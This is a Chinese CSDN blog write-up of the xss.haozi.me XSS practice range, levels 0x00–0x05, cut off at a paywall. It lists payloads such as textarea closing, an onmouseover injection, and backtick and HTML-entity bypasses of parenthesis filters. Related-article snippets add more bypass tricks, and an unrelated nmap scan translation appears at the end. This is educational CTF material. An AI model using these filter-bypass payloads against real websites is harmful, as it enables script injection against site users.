xss.haozi 思路总结 0x00-0x12

最新推荐文章于 2024-07-28 08:30:00 发布
最新推荐文章于 2024-07-28 08:30:00 发布
阅读量1.5k 收藏 6
点赞数
分类专栏: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yukinorong/article/details/99852935
版权
本文介绍了XSS Haozi网站(https://xss.haozi.me/)上的XSS练习题,从0x00到0x12,详细解析了每一道题目的解题思路,包括利用反引号、字符编码、html注释、换行符等各种绕过过滤的方法,以及浏览器兼容性和HTML与JS大小写差异等知识点。
摘要由CSDN通过智能技术生成

xss刷题网站2 https://xss.haozi.me/

一个非常可爱的网站。这是网站界面,题目序号是十六进制,一共19道题。
在这里插入图片描述

0x00

直接输入<script>alert(1)</script>

0x01

先闭合textarea框再实现</textarea><script>alert(1)</script>

0x02

在input框中,先引号闭合,再输入onmouseover="alert(1)">
太强了,在input code中输入是实时反馈的,强推这个网站。

0x03

题目过滤了(),利用反引号`绕过
反引号可以替代单双引号

0x04

题目过滤了()`,利用字符编码绕过
<img src="" onerror=javascript:alert&#x28;1&#x29;>

0x05

html注释有两种格式,
<!-- xxx -

最低0.47元/天 解锁文章
图南yukino
关注
专栏目录
xss.haozi.me弹窗练习0x00-0x10
weixin_52159400的博客
07-28 640
alert(1)
xss靶场haozi.me过关
2301_80063785的博客
07-03 261
过滤了html标签,使用onerror绕过(onerror不依靠标签触发)"被替换为\",所以依旧可以使用,再使用分号隔开以及利用后面的")完成输出。普通字符标签被添加‘_’,使用特殊字符‘ ſ ’,ſ 与s相同。被替换,因为正则不能匹配空格,所以添加空格。由于编码在html标签中,所以被替换的编码会被还原再执行。先输入固定网址,然后闭合,进行报错绕过。没有任何过滤,直接使用script标签。对 ` 也进行了过滤,使用编码绕过。没有过滤script标签,直接闭合。
XSS 常用标签及绕过姿势总结
hackzkaq的博客
08-17 5961
A位置可填充 /,/123/,%09,%0A,%0C,%0D,%20 B位置可填充 %09,%0A,%0C,%0D,%20 C位置可填充 %0B,/**/,如果加了双引号,则可以填充 %09,%0A,%0C,%0D,%20 D位置可填充 %09,%0A,%0C,%0D,%20,//,>例如 javascript:alert(1) ,进行 Unicode 编码时,只能对 alert 和 “1” 进行编码,框号编码后会被当成文本字符,不能执行。...
XSS漏洞:xss.haozi.me靶场1-12 | A-F
最新发布
weixin_68416970的博客
07-28 2853
XSS漏洞靶场,xss.haozi.me靶场的1-12关、A-F关通关教程
xss.haozi练习通关详解
爱国小白帽
11-05 2541
题目连接:https://xss.haozi.me 0x00 原理解读: 这个游戏是要弹图片才算通关的,光弹窗不行,所以第一关就用最简单的img标签过 payload: <img src="任意图片名" onerror="alert(1)"> 0x01 原理解读: 从server code中可以看到输入的内容被插入到了<textarea>标签中,所以只要闭合这个标签就行了 payload: </textarea><img src="任意图片名" onerror=
xss.haozi.me练习通关
lml_0916的博客
07-27 585
这里将auto或者on过滤成了_,并且是在input标签输出,所以这里可以将type的值改成imge的形式进行输出,并且使用换行的方式来停止以on开头=结尾变成_。这一关是将括号给过滤掉了,也就是说alert()的括号不可以直接打印出来,所以这里可以采用两种方式,一种是编码的形式,另一种就是使用反引号来代替括号。这一关限制了不可以对style标签进行闭合,一旦出现会转变为“坏人”,但是html中将标签换行也是可以识别的,所以可以换行处理标签。将src闭合,然后写弹窗,然后将后面注释。............
XXS靶场haozi
m0_61579490的博客
08-02 552
XXS靶场之线上靶场haozi
XSS靶场(二)xss.haozi
C_LCH_2000的博客
07-29 325
xss.haozi所有关卡解法
xss.haozi.me
沐目的博客
07-09 5087
集训第二周 星期一 第二个星期了,再发一篇。感觉自己好像没学什么东西。就学了个HTML和JavaScript。今天开始XSS的实战,这篇博客主要就是写一下题解。 先给出XSS靶场的地址: https://xss.haozi.me/#/0x00 我是在谷歌上写的,不知道为什么同样的payload在火狐上不能用。 0x00 第一关应该没什么讲的吧,啥都没有,直接给payload了。 <img ...
Xss.haozi在线练习靶场1-19关(带答案及靶场地址)
2301_78238055的博客
08-22 712
一个在线的XSS练习靶场19关全带通关答案
xss靶场练习之xss.haozi.me解析及答案
lyz_yyds107的博客
08-05 1046
靶场绕过
xss.haozi.me靶机
newlife1441的博客
07-28 351
对auto和on开头只要加上等于号就会变为下划线,加上大于号大于号也会变为下划线,这里其实就是过滤了autoforce和onerror事件,我们可以使用一个换行的技巧前提要加一个type属性值image和src映射路径属性,然后再让等于号和属性分开。虽然这里对我们可以使用的单引号、双引号等字符进行了转义但是我们可以发现,如果我们输入双引号它会显示/",并没有将双引号成功过滤,所以我们还是可以去使用。alert(1)时需要换行。.........
xss靶场练习(一)之xss.haozi.me
angry_program的博客
01-29 8048
目录 前言 0x00 0x01 0x02 0x03 0x04 0x05 0x06 0x07 0x08 0x09 0x0A 0x0B 0x0C 0x0D 0x0E 0x0F 0x10 0x11 0x12 前言 xss实战第一部曲, 实战的靶场是部署在github上的, 所以可能有些延迟(你懂的), 然后给出地址: https://xss.hao...
在线xss漏洞通关https://xss.haozi.me/(1-18)
weixin_67832625的博客
07-25 1099
xss-labs(1-18)全代码教程,黑客小游戏,附加网页地址和通关照片,通过手动闭合,注释,xss注入来通关完成,go,go,go!!!!!!
XSS漏洞:xss.haozi.me靶场通关
qq_68163788的博客
01-18 2188
xss.haozi.me是一个专门用于测试和学习跨站脚本(XSS)漏洞的靶场。XSS漏洞是一种常见的Web安全漏洞,攻击者通过在网页中注入恶意脚本,可以获取用户的敏感信息,如Cookie、会话令牌等。 通关xss.haozi.me靶场意味着成功利用了该靶场中的XSS漏洞,并完成了相应的任务。在这个过程中,你需要利用各种XSS漏洞,包括反射型XSS、存储型XSS等,来实现跨站脚本攻击,并获取相应的flag或者完成指定的任务。 通过通关xss.haozi.me靶场,你可以提升自己的Web安全技能,了解XSS
xss靶场、xss.haozi.me靶场详细通关教程
LawnCat的博客
03-27 2446
该靶场来自xss.haozi.me,其中一些解题方法也是根据官方的题解。该文章主要用于记录自己的学习历程。xss.haozi.me是一个学习xss漏洞非常不错的靶场,里面集合了各种绕过方式,对于小白来说非常具有学习意义。
XSShaozi me 题解——人生第一份CSDN题解
Mr_Fmnwon的博客
08-05 698
XSS 靶场:xss.haozi.me 认真写的第一篇WP,以此总结,以此自勉
请帮我翻译 Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-08 15:58 CST Pre-scan script results: | broadcast-avahi-dos: | Discovered hosts: | 224.0.0.251 | After NULL UDP avahi packet DoS (CVE-2011-1002). |_ Hosts are all up (not vulnerable). Nmap scan report for MiWiFi-RA72-srv (192.168.31.244) Host is up (0.026s latency). Not shown: 995 closed tcp ports (reset) PORT STATE SERVICE 80/tcp open http |_http-csrf: Couldn't find any CSRF vulnerabilities. |_http-dombased-xss: Couldn't find any DOM based XSS. |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. | http-slowloris-check: | VULNERABLE: | Slowloris DOS attack | State: LIKELY VULNERABLE | IDs: CVE:CVE-2007-6750 | Slowloris tries to keep many connections to the target web server open and hold | them open as long as possible. It accomplishes this by opening connections to | the target web server and sending a partial request. By doing so, it starves | the http server's resources causing Denial Of Service. | | Disclosure date: 2009-09-17 | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750 |_ http://ha.ckers.org/slowloris/ 443/tcp open https |_http-dombased-xss: Couldn't find any DOM based XSS. |_http-csrf: Couldn't find any CSRF vulnerabilities. |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. 631/tcp open ipp 8080/tcp open http-proxy 9100/tcp open jetdirect MAC Address: 6C:02:E0:20:74:2A (HP) Nmap done: 1 IP address (1 host up) scanned in 193.99 seconds
06-09
在2023年6月8日15:58 CST,开始扫描MiWiFi-RA72-srv (192.168.31.244)。预扫描脚本结果如下:| broadcast-avahi-dos: | 发现主机:| 224.0.0.251 | 在NULL UDP avahi数据包DoS之后(CVE-2011-1002),主机都是活跃的(没有漏洞)。 未显示:995个关闭的TCP端口(已重置)。端口状态和服务如下:80/tcp open http,443/tcp open https,631/tcp open ipp,8080/tcp open http-proxy,9100/tcp open jetdirect。MAC地址为6C:02:E0:20:74:2A(HP)。HTTP扫描结果:|_http-csrf:找不到任何CSRF漏洞。|_http-dombased-xss:找不到任何基于DOM的XSS。|_http-stored-xss:找不到任何存储的XSS漏洞。| http-slowloris-check:| 易受攻击:慢速loris DOS攻击| 状态:可能易受攻击| IDs:CVE:CVE-2007-6750 |慢速loris试图保持许多连接到目标网络服务器的打开状态,并尽可能长时间保持它们打开。它通过向目标网络服务器打开连接并发送部分请求来实现这一点。通过这样做,它会使http服务器的资源饥饿,从而导致拒绝服务。| |披露日期:2009-09-17| 引用:| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750|_ http://ha.ckers.org/slowloris/。扫描完成:1个IP地址(1个主机)在193.99秒内扫描。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值